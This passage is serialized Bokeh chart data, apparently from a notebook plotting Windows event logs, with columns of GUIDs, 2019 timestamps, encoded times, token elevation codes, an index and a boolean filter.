9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1896\"},\"selection_policy\":{\"id\":\"1897\"}},\"id\":\"1779\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"booleans\":[false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,true,false,false,true,true,false,false,false,false,false,false,false,false,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false]},\"id\